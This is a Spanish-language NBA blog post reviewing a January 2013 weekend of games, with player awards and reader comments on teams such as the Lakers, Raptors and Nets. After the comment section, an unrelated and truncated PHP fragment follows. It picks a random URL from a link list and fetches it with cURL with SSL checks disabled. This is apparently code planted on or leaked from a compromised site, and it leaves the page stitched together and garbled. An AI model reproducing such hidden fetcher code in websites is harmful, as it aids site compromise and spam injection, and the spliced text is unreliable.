Informe del fin de semana: KD Rules

14 de January de 2013 por MagicJohnson32

deron netsEl fin de semana se cierra con los Thunder aupados al liderato de la conferencia y de la liga tras aprovechar el traspiés de los Clippers. Empecemos con lo que nos dejó el viernes, cuando asistimos a las victorias de algunos de los equipos que llegaban más en forma, caso de Boston. Los Celtics son al fin un equipo reconocible, y no es coincidencia que hayan empezado a ganar partidos a raíz del regreso de Avery Bradley. Rondo ha perdido protagonismo pero los verdes funcionan mejor a partir de una excelente defensa de perímetro y un banquillo mucho más productivo. El viernes sumaron su sexta victoria seguida ante unos Rockets cada vez más flojos como visitantes y que el sábado también cayeron en Philadelphia frente a los Sixers, que por su parte venían de perder cinco partidos consecutivos. Tanto Sixers como Rockets necesitan enmendar sus trayectorias recientes si quieren estar en los Playoffs, mientras los Celtics ya aspiran incluso al liderato de la Atlantic, división que se ha apretado mucho dadas las últimas derrotas de los Knicks y la emergencia de Celtics y Nets.

Los de Brooklyn han resucitado tras la marcha de Avery Johnson y con PJ Carlessimo a las riendas, que se ha traducido en un Deron infinitamente más relajado y acertado en el lanzamiento. No tuvieron problema alguno frente a los Suns el viernes y supieron remontar en el último cuarto anoche a los Pacers para así aprovechar la tercera derrota seguida de los Knicks, que perdieron en el MSG una vez más ante los Bulls (3-0 esta temporada para Chicago en este duelo particular) con exhibición de Deng y pese al arreón final de Melo. El sábado, sin embargo, los de Thibodeau se vieron sorprendidos por Phoenix y las extraordinariamente productivas actuaciones de Scola y Beasley.

Hornets y Raptors están siguiendo caminos paralelos últimamente y clavaron sus actuaciones este fin de semana. Ambos vencieron el viernes, ante Wolves y Bobcats respectivamente, pero no pudieron repetir ayer domingo. Los Hornets (que han agradecido tanto la vuelta de Eric Gordon como la desaparición de Austin Rivers del quinteto) arrancaron bien pero se desinflaron y perdieron en pista de los Knicks, y los Raptors cedieron frente a los Bucks en un partido muy igualado que al final se decidió por el pésimo rendimiento del banquillo canadiense, en especial de un Kyle Lowry desquiciado y desaparecido.

En un partido con todo el aroma de los Playoffs, Tony Parker forzó la prórroga en Memphis pero los Spurs se ahogaron en la orilla, sólo anotaron tres puntos en el tiempo extra y perdieron ante los Grizzlies, que a la noche siguiente pagaron el esfuerzo y cayeron con claridad en Dallas. Los Spurs, sin embargo, se resarcieron con una victoria cómoda ante Minnesota. Otro base brilló con luz propia pese a la derrota de su equipo: Damian ‘ROY’ Lillard, que en un día negro por parte de muchos de sus compañeros, se lució en Oakland y a punto estuvo de remontar y ganar él solo el partido. Los Warriors, sin embargo, son mucho equipo este año y no dejaron escapar la victoria del Oracle.

afflalo clipsUno de los equipos que salieron más reforzados de la semana ayer concluida son los Nuggets, con Gallinari en su mejor momento. El viernes no lo tuvieron fácil ante unos meritorios Cavs y ayer tumbaron a los Warriors gracias a un 18-37 el último cuarto. Otro tanto se puede decir de los Thunder, quienes aplastaron a los Lakers en el partido que puso fin a la jornada del viernes y anoche, con más problemas, sin Sefolosha ni Ibaka pero siempre con Durant a los mandos, se impusieron a los Blazers y se situaron líderes del Oeste. Los angelinos, de nuevo sin Howard ni Gasol y que acababan de saber que perdían a Jordan Hill para toda la temporada, fueron el viernes un juguete en manos de Kevin Durant. Anoche, con Howard de vuelta, se desquitaron ante los Cavs en un partido sin historia en el que tal vez lo más interesante fue el plan defensivo de D’Antoni, con Kobe sobre Irving, para mantener el balón lejos de las manos del base. Dos semanas han necesitado los Lakers para lograr su primera victoria del año.

El sábado se inició con una de las grandes sorpresas (y de los partidos más bonitos) del fin de semana: la victoria de los Magic ante los Clippers. Afflalo lideró la remontada local, con Vucevic una vez más inconmensurable bajo los aros, y al fin Orlando sumó un más que merecido triunfo. El excelente partido de Griffin no tuvo recompensa esta vez y el debut de Grant Hill dejó más dudas que otra cosa. También debutó esta temporada John Wall, quien ofreció algunos buenos detalles en la victoria de los Wizards ante los Hawks.

Nos quedan únicamente por comentar del viernes las victorias de Atlanta sobre Utah Jazz y de los Pistons en Milwaukee, y del sábado los triunfos de los ascendentes Pacers frente a los Bobcats, con triple doble de David West, y la demostración triplista de Mario Chalmers (34 puntos, 10 triples) en la paliza de los Heat a los Kings.

kd thuderPREMIOS

MVP: Impresionante Kevin Durant. El viernes liquidó a los Lakers con 42 puntos y un 64% de acierto en el tiro, y anoche destrozó a los Blazers con 33 puntos y un 57% de acierto. Evidentemente, además dejó su habitual aportación en rebotes, asistencias y robos.

Rookie: El viernes Damian Lillard nos dejó una señora exhibición de 37 puntos, 4 asistencias, 6 rebotes y 2 robos. Anoche ante los Thunder no estuvo nada acertado en el tiro pero repartió 9 asistencias. El que se salió anoche fue Harrison Barnes con 21 puntos (8 de 11) y 6 rebotes. Chris Copeland salió de titular y aportó 22 puntos.

Sorpresa: Es la primera vez desde que en Miami juegan juntos LeBron, Wade y Bosh que otro jugador lidera a su equipo en un anotación en un partido. Lo consiguió el sábado Mario Chalmers tras anotar 10 triples y acabar el partido con 34 puntos. Ojo al estado de forma de Amir Johnson. El viernes consiguió 13 puntos, 8 rebotes, 2 asistencias, 2 robos y 2 tapones pero es que ayer se fue a los 22 puntos, 14 rebotes, 4 asistencias, 2 tapones y 3 robos. Y, en una de las pocas buenas noticias que han recibido los Lakers en mucho tiempo, Earl Clark ha respondido a la titularidad con unos totales de 23 puntos, 19 rebotes, 7 asistencias y 6 tapones en los dos partidos jugados hasta el momento.

Esfuerzo en vano: David Lee ganó a los Blazers pero perdió anoche ante Denver. El viernes jugó al gran nivel que nos tiene acostumbrados (24-10) pero anoche se salió con 23 puntos, 13 rebotes y 6 asistencias. Blake Griffin firmó unos espectaculares 30 puntos con 15 de 22 en tiros, 8 rebotes y 7 asistencias en la derrota frente a Orlando.

Top 10

Comenta

13 comentarios a esta entrada

  1. kreakone dice:
    #1

    Muy buenas!! Habéis pensado hacer alguna liguilla del fantasy NBA+ del blog??

      Citar

  2. Ruxixón dice:
    #2

    Enhorabuena a los Lakers.D’Antoni,como con el fenómeno Lin en los Knicks,sabe sacar provecho de jugadores anclados en el ostracismo,vamos,es un descubridor de talentos nato.Justo cuando nadie lo esperaba ha sacado un activo más de la manga….Clark y Lin,dos jugadores que le deben dar gracias a D’Antoni (nótese la ironía en todo el párrafo)

    Ahora en serio,Clark se merece entrar en las rotaciones si o si,ahora mismo es el pegamento del equipo.Se dilatará hasta el deadline pero es el momento de traspasar a Gasol por jugadores de rotación(base y pívot) y algún expiring medianamente aprovechable,y darle absolutamente todo el protagonismo a Howard -darle los tiros de Gasol- en la pintura,para lo bueno y para lo malo.

    EL caso Calde/Lowry en Toronto es digno de estudio.Calderón está jugando a su mejor nivel,justo cuando acaba contrato -si fuera turco estaríamos hablando del cazo mix-,y Lowry,apuesta de la franquicia firmada a muy buen precio está empeorando su rendimiento poco a poco.Sinceramente pienso que todo es estrategia para vender a Calderón de la mejor manera pero ahora mismo los Raptors son un equipo que gana con Calde en la dirección.

      Citar

  3. Simon dice:
    #3

    Bueno los Nuggets cada vez son mas parecidos a lo que esperabamos a principio de temporada en cuanto a porcentaje de victorias. El inicio tan “malo” fue propiciado por un calendario super duro en el primer mes de competición. En casa pueden ganar a quien sea… Gallinari y Lawson aunque aun algo irregulares ya están recuperandose de un mal inicio de campaña e Iguodala cada vez está mas involucrado en la dinámica del equipo y en el rol que le corresponde. Una lástima que A.Randolph no tenga un hueco en la rotación… en mi opinión podría ayudarlos mucho pero el maestro Karl tengrá sus motivos.

      Citar

  4. Viva_Dirk dice:
    #4

    Pues Calderon sería un gran fichaje para los Lakers, pero sin Bargnani eh! Calde+Amir cuadraría practicamente en salarios.

      Citar

  5. Esteban dice:
    #5

    calderon seria un biuen ficvhaje para cualquiera si aceptara rescindir su contrato, pero a 10 millones no va a ningun lado

      Citar

  6. rumbero dice:
    #6

    El partido que perdieron ayer los Raptors tiene delito. 18 arriba en el primer cuarto con un Calderón en plan All-Star para luego tener una pájara tremenda en el segundo. Ya con el partido igualado les entro flojera a los de Toronto que defendieron entre poco y nada. Horrible el banquillo, justo lo contrario que en los Bucks donde Dunleavy y Henson se salieron. Una lástima porque una victoria les hubiera puesto a 3 juegos de Milwaukee para intentar meter algo de presión.

    Muy buena impresión me dejo Henson. Le faltan kilos y más de un movimiento cuando no está cerca del aro, pero con esos brazacos y esa defensa puede ser un tio muy interesante. Algo parecido me pasa con Sullinger, aunque a este le faltan centimetros y no kilos, y mejorar la defensa y su terrible problema con las faltas, pero que pinta tan buena el draft de este año…

      Citar

  7. Denise dice:
    #7

    Y ahora a que se debe la drastica reducción de minutos a Meeks por parte de D’Anthoni? Este hombre parece que necesita un cabeza de turco…Pau, Ebanks, Jamison, Meeks…

      Citar

  8. GreenPride dice:
    #8

    La temporada está en un momento super interesante con equipos que empezaron bien en clara bajada y al revés.
    Cumplen su lugar como candidatos a todo Heat, Thunder, Spurs y Clippers (estos funcionando incluso mejor de lo esperado). Están al nivel que se esperaba equipos como Knicks y Memphis. Empezaron mal pero parecen recuperados y ganando terreno equipos a los que se esperaba arriba como Pacers, Celtics, Nuggets y Nets. Y empiezan a bajar un poco algunos que empezaron mejor de los esperado como Warriors, Hawks o Rockets y otras dan más guerra de la esperada como Bucks o Bulls (Blazers o Jazz en el Oeste). En definitiva muchas cosas por decidir y una temporada que promete ser de las más igualadas de los últimos años… y queda por ver si los Lakers pueden acabar ensamblándose y dando de sí lo que debieran en vez del desastre actual. Mucho por decidir en una temporada muy entretenida

      Citar

  9. Esteban dice:
    #9

    los nets 8-1 con carlasino, a los tumbos pero van, sin jugar demasiado boien ni brillar en absoluto, v¡se encaminan a ser el tercer mejor equipo del este,

      Citar

  10. Jose Luis dice:
    #10

    Quizá ahora sin Hill D’Antoni haga jugar más a Gasol por dentro, pero tendrá que ser compartiendo minutos con Nash o Bryant, ya que parecen los únicos capaces de meter un balón ahí abajo. Pau ante los centers suplentes debería abusar. Dejar a Gasol con Morris, Meeks, Peace, Clark o Jamison es casi mostrar más sus carencias, porque solo habrá tiros perimetrales, rebotes largos y contraataques.

      Citar

  11. nba dice:
    #11

    Es que la victoria de Lakers contra Cavs, no tiene ningun merito sin Varejao en la pista, yo tengo claro que con el, los Lakers habrian perdido de manera sonrojante en el staples

      Citar

  12. rojorob dice:
    #12

    kreakone:
    Muy buenas!! Habéis pensado hacer alguna liguilla del fantasy NBA+ del blog??

    Yo ya tengo equipo. Si alguien más se apunta avisad.

      Citar

  13. MagicJohnson32 dice:
    #13

    Denise:
    Y ahora a que se debe la drastica reducción de minutos a Meeks por parte de D’Anthoni? Este hombre parece que necesita un cabeza de turco…Pau, Ebanks, Jamison, Meeks…

    Se debe a que no está jugando bien, a que ha llegado a 10 puntos dos veces en los últimos diez partidos, y a que Clark se ha ganado sus 30 minutos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>